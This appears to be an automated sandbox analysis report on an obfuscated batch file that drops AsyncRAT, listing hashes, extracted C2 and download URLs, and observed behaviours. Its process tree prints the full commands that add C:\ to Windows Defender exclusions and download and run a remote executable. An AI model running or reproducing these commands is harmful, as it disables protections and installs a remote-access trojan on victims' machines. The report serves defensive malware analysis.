Analysis
-
max time kernel
34s -
max time network
35s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-10-2024 01:32
Static task
static1
Behavioral task
behavioral1
Sample
cool-obf.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
cool-obf.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
cool-obf.bat
-
Size
20KB
-
MD5
99525fe4bc3b8826a79437472b315528
-
SHA1
6f4c3291b57e996bac223dda1b7b1bcfea8d4528
-
SHA256
e0912478bf932332e047a18ba0431920547bbd7310b2b87eab25b78e03889ef3
-
SHA512
6dca8ca280024c06b37c42d0f92b5d3b8cb7479fd527e9c5fc81efac8cd22c6adc6ac5dd2e5fdb8aeebff2634ea010ce9497c20dbf58addd382597855ac81887
-
SSDEEP
384:UmN+vVczZIkT0EFDuWLhGzAzjpyHGGwWW9l:PQvVc1jT0EFDuWLhGsfpyHzw79l
Malware Config
Extracted
https://raw.githubusercontent.com/venkovisual/Loli-Mod/refs/heads/main/AsyncClient.exe
Extracted
asyncrat
AsyncRAT
Default
yyyson22.gleeze.com:4608
dw
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\AsyncClient.exe family_asyncrat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 3944 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 1472 powershell.exe 3944 powershell.exe 1472 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
AsyncClient.exepid process 1480 AsyncClient.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
AsyncClient.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncClient.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exeAsyncClient.exepid process 1472 powershell.exe 1472 powershell.exe 3944 powershell.exe 3944 powershell.exe 1480 AsyncClient.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeAsyncClient.exedescription pid process Token: SeDebugPrivilege 1472 powershell.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 1480 AsyncClient.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
AsyncClient.exepid process 1480 AsyncClient.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
cmd.exedescription pid process target process PID 3768 wrote to memory of 4524 3768 cmd.exe chcp.com PID 3768 wrote to memory of 4524 3768 cmd.exe chcp.com PID 3768 wrote to memory of 3216 3768 cmd.exe find.exe PID 3768 wrote to memory of 3216 3768 cmd.exe find.exe PID 3768 wrote to memory of 4884 3768 cmd.exe findstr.exe PID 3768 wrote to memory of 4884 3768 cmd.exe findstr.exe PID 3768 wrote to memory of 4300 3768 cmd.exe findstr.exe PID 3768 wrote to memory of 4300 3768 cmd.exe findstr.exe PID 3768 wrote to memory of 980 3768 cmd.exe findstr.exe PID 3768 wrote to memory of 980 3768 cmd.exe findstr.exe PID 3768 wrote to memory of 64 3768 cmd.exe findstr.exe PID 3768 wrote to memory of 64 3768 cmd.exe findstr.exe PID 3768 wrote to memory of 2316 3768 cmd.exe cmd.exe PID 3768 wrote to memory of 2316 3768 cmd.exe cmd.exe PID 3768 wrote to memory of 2176 3768 cmd.exe find.exe PID 3768 wrote to memory of 2176 3768 cmd.exe find.exe PID 3768 wrote to memory of 4804 3768 cmd.exe cmd.exe PID 3768 wrote to memory of 4804 3768 cmd.exe cmd.exe PID 3768 wrote to memory of 1472 3768 cmd.exe powershell.exe PID 3768 wrote to memory of 1472 3768 cmd.exe powershell.exe PID 3768 wrote to memory of 3944 3768 cmd.exe powershell.exe PID 3768 wrote to memory of 3944 3768 cmd.exe powershell.exe PID 3768 wrote to memory of 1480 3768 cmd.exe AsyncClient.exe PID 3768 wrote to memory of 1480 3768 cmd.exe AsyncClient.exe PID 3768 wrote to memory of 1480 3768 cmd.exe AsyncClient.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cool-obf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\system32\chcp.comchcp.com 4372⤵PID:4524
-
C:\Windows\system32\find.exefind2⤵PID:3216
-
C:\Windows\system32\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\cool-obf.bat2⤵PID:4884
-
C:\Windows\system32\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\cool-obf.bat2⤵PID:4300
-
C:\Windows\system32\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\cool-obf.bat2⤵PID:980
-
C:\Windows\system32\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\cool-obf.bat2⤵PID:64
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:2316
-
C:\Windows\system32\find.exefind2⤵PID:2176
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵PID:4804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/venkovisual/Loli-Mod/refs/heads/main/AsyncClient.exe', 'C:\\AsyncClient.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\AsyncClient.exe"C:\AsyncClient.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1480
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
61KB
MD5a4314ad7e9a2945cf99dd03e9e46f7c1
SHA1326c096e183a17cbc41034c6b6a6917de5347a86
SHA25622639054481629b24309f3ab18f016231ed4f3de6fa6b852598848c1dbe7cf1f
SHA5125787f414ebf281f581e26d21541915897e741995528bb7cc20e5d7c02d8a35e05047cd47e231d3ea389986323ee58039844c075134869a3e63d004c11f08a8c8
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752